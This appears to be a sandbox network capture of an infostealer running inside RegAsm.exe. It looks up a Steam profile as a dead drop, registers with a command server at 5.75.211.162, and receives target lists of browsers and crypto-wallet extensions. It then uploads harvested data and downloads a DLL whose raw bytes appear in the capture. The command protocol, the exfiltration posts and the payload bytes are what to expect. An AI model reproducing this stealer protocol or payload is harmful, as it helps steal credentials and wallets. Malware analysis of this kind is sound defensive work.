2024-09-26 23:50:01 UTC	770	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:50:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6gnsb02an1628kf0tiuml932tr; expires=Mon, 20 Jan 2025 17:36:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cg2mQgyP9q%2BwEkkQWNcoYRnXZdiFYGzJu0bp2n9fxQsSR1Lx5eTvyTOCYK4a6CMwucfVUm8faQTIVYu9D2UyJph7PS2kOG%2FsCDHqCDbfOGRiTDVBm%2Fslw2HPlMw3VSw4Ow%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c972763187978d6-EWR
2024-09-26 23:50:01 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:50:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	49755	104.102.49.254	443	3040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:50:24 UTC	119	OUT	GET /profiles/76561199780418869 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:50:24 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 23:50:24 GMT Content-Length: 34725 Connection: close Set-Cookie: sessionid=4382c22ae80a3027cbedc054; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 23:50:24 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 23:50:24 UTC	16384	IN	Data Raw: 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e Data Ascii: enDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="n
2024-09-26 23:50:24 UTC	3768	IN	Data Raw: 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f Data Ascii: vate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></
2024-09-26 23:50:24 UTC	59	IN	Data Raw: 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: </div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.8	49756	5.75.211.162	443	3040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:50:25 UTC	185	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:50:26 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:50:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:50:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.8	49757	5.75.211.162	443	3040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:50:27 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JECAEHJJJKJKFIDGCBGI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:50:27 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 33 35 33 35 30 46 31 37 38 30 41 31 36 33 33 30 34 37 39 38 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 47 49 2d 2d 0d Data Ascii: ------JECAEHJJJKJKFIDGCBGIContent-Disposition: form-data; name="hwid"C35350F1780A1633047986-a33c7340-61ca------JECAEHJJJKJKFIDGCBGIContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JECAEHJJJKJKFIDGCBGI--
2024-09-26 23:50:27 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:50:27 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:50:27 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 36 63 30 38 62 34 34 39 32 62 36 36 31 64 37 39 64 65 32 38 39 33 64 62 37 30 34 66 39 35 33 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|36c08b4492b661d79de2893db704f953\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.8	49758	5.75.211.162	443	3040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:50:28 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHIIDHCGHCAAAAAFIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:50:28 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 63 30 38 62 34 34 39 32 62 36 36 31 64 37 39 64 65 32 38 39 33 64 62 37 30 34 66 39 35 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------GCGHIIDHCGHCAAAAAFIJContent-Disposition: form-data; name="token"36c08b4492b661d79de2893db704f953------GCGHIIDHCGHCAAAAAFIJContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------GCGHIIDHCGHCAAAAAFIJCont
2024-09-26 23:50:29 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:50:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:50:29 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.8	49759	5.75.211.162	443	3040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:50:29 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFBAAFHDHCBGCAKFHDAK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:50:29 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 63 30 38 62 34 34 39 32 62 36 36 31 64 37 39 64 65 32 38 39 33 64 62 37 30 34 66 39 35 33 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 41 41 46 48 44 48 43 42 47 43 41 4b 46 48 44 41 4b 0d 0a 43 6f 6e 74 Data Ascii: ------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="token"36c08b4492b661d79de2893db704f953------BFBAAFHDHCBGCAKFHDAKContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------BFBAAFHDHCBGCAKFHDAKCont
2024-09-26 23:50:30 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:50:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:50:30 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.8	49760	5.75.211.162	443	3040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:50:31 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:50:31 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 63 30 38 62 34 34 39 32 62 36 36 31 64 37 39 64 65 32 38 39 33 64 62 37 30 34 66 39 35 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="token"36c08b4492b661d79de2893db704f953------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------JDHIEBFHCAKEHIDGHCBACont
2024-09-26 23:50:32 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:50:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:50:32 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.8	49761	5.75.211.162	443	3040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:50:33 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGIEHDBAAFIDGDAAAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 6769 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:50:33 UTC	6769	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 36 63 30 38 62 34 34 39 32 62 36 36 31 64 37 39 64 65 32 38 39 33 64 62 37 30 34 66 39 35 33 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 39 30 38 34 30 61 38 34 36 64 30 31 37 65 37 62 30 39 35 66 37 35 34 33 63 64 66 32 64 31 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 49 45 48 44 42 41 41 46 49 44 47 44 41 41 41 41 0d 0a 43 6f 6e 74 Data Ascii: ------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="token"36c08b4492b661d79de2893db704f953------ECBGIEHDBAAFIDGDAAAAContent-Disposition: form-data; name="build_id"e90840a846d017e7b095f7543cdf2d15------ECBGIEHDBAAFIDGDAAAACont
2024-09-26 23:50:33 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:50:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:50:33 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.8	49762	5.75.211.162	443	3040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:50:34 UTC	193	OUT	GET /sqlp.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:50:34 UTC	263	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:50:34 GMT Content-Type: application/octet-stream Content-Length: 2459136 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:50:34 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 23:50:34 UTC	16121	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
2024-09-26 23:50:34 UTC	16384	IN	Data Raw: b2 1e 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: %:X~e!*FW\|>\|L1146
2024-09-26 23:50:34 UTC	16384	IN	Data Raw: 10 8b c3 0f 1f 40 00 8a 10 3a 11 75 1a 84 d2 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 Data Ascii: @:utP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh 